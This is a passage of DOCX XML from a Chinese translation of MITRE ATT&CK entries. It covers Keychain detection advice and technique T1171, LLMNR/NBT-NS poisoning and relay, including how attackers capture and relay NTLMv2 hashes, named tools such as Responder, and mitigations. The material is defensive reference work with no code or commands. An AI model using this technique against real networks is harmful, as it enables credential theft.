          <w:p w14:paraId="39E6F68F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="004779E1" w:rsidRDefault="00CC5590" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId158" w:history="1">
              <w:r w:rsidR="000F2665" w:rsidRPr="004779E1">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>密码策略</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7584" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6C8DA5DC" w14:textId="09F91663" w:rsidR="000F2665" w:rsidRPr="004779E1" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="004779E1">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>可以从用户的登录密码更改用户登录</w:t>
            </w:r>
            <w:r w:rsidR="006508E9">
              <w:t>Keychain</w:t>
            </w:r>
            <w:r w:rsidRPr="004779E1">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>的密码。</w:t>
            </w:r>
            <w:r w:rsidRPr="004779E1">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="004779E1">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>对于攻击者而言，这增加了破译复杂性，因为他们需要知道额外的密码。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="366E4471" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F44789F" w14:textId="5430DD6F" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00757366">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cstheme="minorBidi" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:kern w:val="2"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>解锁</w:t>
      </w:r>
      <w:r w:rsidR="006508E9">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cstheme="minorBidi"/>
          <w:color w:val="39434C"/>
          <w:kern w:val="2"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Keychain</w:t>
      </w:r>
      <w:r w:rsidRPr="00757366">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cstheme="minorBidi" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:kern w:val="2"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>并使用密码是一个非常常见的过程，因此任何检测技术都可能存在很多噪音。</w:t>
      </w:r>
      <w:r w:rsidRPr="00757366">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cstheme="minorBidi" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:kern w:val="2"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00757366">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cstheme="minorBidi" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:kern w:val="2"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>监视对</w:t>
      </w:r>
      <w:r w:rsidR="006508E9">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cstheme="minorBidi"/>
          <w:color w:val="39434C"/>
          <w:kern w:val="2"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Keychain</w:t>
      </w:r>
      <w:r w:rsidRPr="00757366">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cstheme="minorBidi" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:kern w:val="2"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>的系统调用可以帮助确定是否有可疑进程试图访问它。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D42FDF" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">LLMNR/NBT-NS </w:t>
      </w:r>
      <w:r w:rsidRPr="00F62C36">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中毒和中继</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w14:paraId="1AD3D7A5" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="273D5C20" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="008357C6" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="008357C6">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="008357C6">
              <w:t xml:space="preserve"> T1171</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7803F07E" w14:textId="49DB9411" w:rsidR="000F2665" w:rsidRPr="008357C6" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术</w:t>
            </w:r>
            <w:r w:rsidRPr="008357C6">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="008357C6">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="006508E9">
              <w:t>凭据访问</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A2E0CCE" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="008357C6" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="008357C6">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="008357C6">
              <w:t xml:space="preserve"> Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="63AE1E90" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="008357C6" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="008357C6">
              <w:t>所需权限：</w:t>
            </w:r>
            <w:r w:rsidRPr="008357C6">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="008357C6">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="29D77173" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="008357C6" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="008357C6">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="008357C6">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="008357C6">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Windows</w:t>
            </w:r>
            <w:r w:rsidRPr="008357C6">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>事件日志，</w:t>
            </w:r>
            <w:r w:rsidRPr="008357C6">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Windows</w:t>
            </w:r>
            <w:r w:rsidRPr="008357C6">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>注册表，网络抓包，</w:t>
            </w:r>
            <w:r w:rsidRPr="008357C6">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Netflow/Enclave</w:t>
            </w:r>
            <w:r w:rsidRPr="008357C6">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>技术网络流分析</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="49281B46" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="008357C6" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="008357C6">
              <w:t>贡献者</w:t>
            </w:r>
            <w:r w:rsidRPr="008357C6">
              <w:t>: Eric Kuehn, Secure Ideas; Matthew Demaske, Adaptforward</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="22AB25BF" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="008357C6">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="008357C6">
              <w:t xml:space="preserve"> 2.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4C04A4D1" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6933B187" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00675934">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>链路本地多播名称解析（</w:t>
      </w:r>
      <w:r w:rsidRPr="00675934">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>LLMNR</w:t>
      </w:r>
      <w:r w:rsidRPr="00675934">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）和</w:t>
      </w:r>
      <w:r w:rsidRPr="00675934">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>NetBIOS</w:t>
      </w:r>
      <w:r w:rsidRPr="00675934">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>名称服务（</w:t>
      </w:r>
      <w:r w:rsidRPr="00675934">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>NBT-NS</w:t>
      </w:r>
      <w:r w:rsidRPr="00675934">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）是</w:t>
      </w:r>
      <w:r w:rsidRPr="00675934">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Microsoft Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00675934">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>组件，可用作主机标识的备用方法。</w:t>
      </w:r>
      <w:r w:rsidRPr="00675934">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> LLMNR</w:t>
      </w:r>
      <w:r w:rsidRPr="00675934">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>基于域名系统（</w:t>
      </w:r>
      <w:r w:rsidRPr="00675934">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DNS</w:t>
      </w:r>
      <w:r w:rsidRPr="00675934">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）格式，允许同一本地链路上的主机为其他主机执行名称解析。</w:t>
      </w:r>
      <w:r w:rsidRPr="00675934">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> NBT-NS</w:t>
      </w:r>
      <w:r w:rsidRPr="00675934">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过其</w:t>
      </w:r>
      <w:r w:rsidRPr="00675934">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>NetBIOS</w:t>
      </w:r>
      <w:r w:rsidRPr="00675934">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>名称识别本地网络上的系统。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F2E6C71" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00675934">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可以通过响应</w:t>
      </w:r>
      <w:r w:rsidRPr="00675934">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>LLMNR</w:t>
      </w:r>
      <w:r w:rsidRPr="00675934">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00675934">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>UDP 5355</w:t>
      </w:r>
      <w:r w:rsidRPr="00675934">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="00675934">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/ NBT-NS</w:t>
      </w:r>
      <w:r w:rsidRPr="00675934">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00675934">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>UDP 137</w:t>
      </w:r>
      <w:r w:rsidRPr="00675934">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）流量来欺骗受害网络上的名称解析的权威来源，就好像他们知道所请求主机的身份一样，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从而</w:t>
      </w:r>
      <w:r w:rsidRPr="00675934">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有效地</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击</w:t>
      </w:r>
      <w:r w:rsidRPr="00675934">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务以便受害者与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>被攻击者</w:t>
      </w:r>
      <w:r w:rsidRPr="00675934">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>控制</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00675934">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统进行通信</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00675934">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果请求的主机属于需要标识</w:t>
      </w:r>
      <w:r w:rsidRPr="00675934">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00675934">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>身份验证的资源，则用户名和</w:t>
      </w:r>
      <w:r w:rsidRPr="00675934">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>NTLMv2</w:t>
      </w:r>
      <w:r w:rsidRPr="00675934">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>哈希将被发送到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者</w:t>
      </w:r>
      <w:r w:rsidRPr="00675934">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>控制的系统。然后，攻击者可以通过监视端口流量或通过</w:t>
      </w:r>
      <w:r w:rsidRPr="004779E1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>网络嗅探</w:t>
      </w:r>
      <w:r w:rsidRPr="00675934">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>工具收集通过线路发送的哈希信息，并通过</w:t>
      </w:r>
      <w:r w:rsidRPr="004779E1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>暴力破解</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>离线破解</w:t>
      </w:r>
      <w:r w:rsidRPr="00675934">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>哈希以获取明文密码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DF13FE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在某些情况下，攻击者可以访问</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>处于</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF13FE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>身份验证路径中的系统，或者当使用凭据的自动扫描</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>功能</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF13FE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>尝试</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对攻击者</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF13FE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>控制的系统进行身份验证时，</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF13FE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>NTLMv2</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF13FE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>哈希可以拦截和中继</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF13FE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以访问和执行针对</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF13FE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DF13FE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目标系统</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的代码</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF13FE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。中继步骤可以与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF13FE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中毒一起发生，但也可以独立于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF13FE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中毒。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33033A8A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="004779E1" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00B17C28">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>存在一些可用于毒害本地网络中的名称服务的工具，例如</w:t>
      </w:r>
      <w:r w:rsidRPr="00B17C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>NBNSpoof</w:t>
      </w:r>
      <w:r w:rsidRPr="00B17C28">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00B17C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:r w:rsidRPr="00B17C28">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="004779E1">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Responder</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE993FB" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2685"/>
        <w:gridCol w:w="7051"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="004779E1" w14:paraId="7869B53D" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2685" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="24DEC17A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="004779E1" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7051" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="10B12F21" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="004779E1" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w14:paraId="58A13513" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2685" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0A5AE478" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="004779E1" w:rsidRDefault="00CC5590" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId159" w:history="1">
              <w:r w:rsidR="000F2665" w:rsidRPr="004779E1">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>禁用或删除功能或程序</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7051" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5BFB7415" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="004779E1" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="004779E1">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>如果在环境中不需要，则在本地计算机安全设置中禁用</w:t>
            </w:r>
            <w:r w:rsidRPr="004779E1">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>LLMNR</w:t>
            </w:r>
            <w:r w:rsidRPr="004779E1">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>和</w:t>
            </w:r>
            <w:r w:rsidRPr="004779E1">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>NetBIOS</w:t>
            </w:r>
            <w:r w:rsidRPr="004779E1">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，或者按组策略禁用</w:t>
            </w:r>
            <w:r w:rsidRPr="004779E1">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>LLMNR</w:t>
            </w:r>
            <w:r w:rsidRPr="004779E1">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>和</w:t>
            </w:r>
            <w:r w:rsidRPr="004779E1">
              <w:t>NetBIOS</w:t>
            </w:r>
            <w:r w:rsidRPr="004779E1">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
